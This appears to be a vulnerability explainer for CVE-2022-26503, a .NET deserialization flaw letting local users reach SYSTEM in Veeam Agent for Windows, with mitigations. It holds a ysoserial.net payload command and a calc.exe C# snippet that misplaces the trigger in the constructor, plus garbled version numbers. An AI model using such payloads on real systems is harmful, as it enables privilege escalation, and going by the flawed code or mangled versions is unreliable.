CVE-2022-26503 - Veeam Agent for Windows Deserialization Vulnerability – Local SYSTEM Privilege Escalation Explained

---

In this deep dive, we uncover how CVE-2022-26503 allows attackers to turn Veeam Agent for Windows into a tool for escalating privileges to SYSTEM. We’ll see how deserialization opens the door, explore real-world exploitation scenarios, and give you resources to learn more.

What Is CVE-2022-26503?

CVE-2022-26503 is a privilege escalation vulnerability in Veeam Agent for Windows, a widely used backup and restore solution for Windows computers, including workstations and servers.

> Affected versions:
> - 2.
> - 2.1
> - 2.2
> - 3..2
> - All 4.x
> - All 5.x

In short: A local user with minimal rights can pass specially-crafted data to the Veeam system service. If Veeam deserializes this data, the attacker can make the agent run arbitrary code – as SYSTEM.

Reference:
- Veeam Security Advisory VSA-2022-0704
- NVD Entry CVE-2022-26503

Why Is Deserialization So Dangerous?

Deserialization is converting an object from a stored or transferred format (like a file or network data) into an in-memory object. If the input isn’t verified, attackers can slip in malicious objects that, when deserialized, trigger dangerous actions.

Here’s a super-simple analogy: Imagine you ask a stranger to mail you a box of Legos in a certain arrangement. You trust them and pour the Legos out blindly to use them, but if they hid a small bomb made of Legos inside…

How the Flaw Happens in Veeam Agent for Windows

Veeam Agent for Windows runs a privileged service:

Veeam.Agent.Configurator.exe (among others), generally running as SYSTEM.

- Some of these agent components accept external data and process it using .NET serialization tools (BinaryFormatter).

These components fail to validate that the deserialized data comes from a trusted source.

Result:
A local unprivileged attacker can inject a malicious .NET object where Veeam is expecting innocuous serialized data. When Veeam runs .Deserialize() on that object, attacker code executes _as SYSTEM_.

Attacker writes a malicious serialized payload (using tools like ysoserial.net).

3. Attacker finds a way to send it to the vulnerable Veeam agent process (typically by interacting via a named pipe or a file, depending on how communication happens in Veeam version).

Code Sample: Building a Deserialization Payload

Let’s say you want to pop a calculator with SYSTEM rights during exploitation. Tools like ysoserial.net make this straightforward.

Example payload generation

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o raw -c "calc.exe" > payload.bin

This creates a .NET BinaryFormatter payload that launches calc.exe.

Exploit Snippet

Below is a simplified C# code a pentester might use to test the vulnerability. It mimics an attacker preparing a payload:

using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace VeeamPayload
{
    class Program
    {
        static void Main(string[] args)
        {
            // Malicious object that triggers code execution
            var payload = new ExploitObject();

            // Serialize it to a file
            using (var file = File.OpenWrite("payload.bin"))
            {
                new BinaryFormatter().Serialize(file, payload);
            }
        }
    }

    // WARNING: This is just a demonstration object!
    [Serializable]
    public class ExploitObject : MarshalByRefObject
    {
        public ExploitObject()
        {
            System.Diagnostics.Process.Start("calc.exe"); // launches calculator
        }
    }
}

An attacker would inject the resulting payload.bin into the communication channel or file that the Veeam service reads and deserializes.

Proof-of-Concept Exploits

While full weaponized public exploits are rare (due to ethical/legal concerns), several researchers have demonstrated LPE using deserialization in Veeam. You can find related writeups and PoCs here:

- Horizon3.ai Writeup & PoC (external blog)
- Exploit DB Entry

How to Stay Safe

- Patch immediately — Upgrade Veeam Agent for Windows to 5..3.4708 or later (see official download links)

Restrict local access — Prevent untrusted users from logging into sensitive systems.

- Monitor for strange child processes spawned by Veeam services (e.g., Veeam.Agent.Configurator.exe launching cmd.exe or calc.exe).

Conclusion

CVE-2022-26503 demonstrates how dangerous deserialization bugs are—especially in trusted, highly privileged services like Veeam. Always treat any object coming from outside your secure perimeter as _hostile_, and never deserialize data you don’t control.

Further Reading and References

- Veeam’s Official KB
- National Vulnerability Database: CVE-2022-26503
- Horizon3.ai Research
- ysoserial.net – GitHub


*Stay secure, stay updated – and always double-check what you’re deserializing!*

Timeline

Published on: 03/17/2022 17:15:00 UTC
Last modified on: 03/23/2022 19:06:00 UTC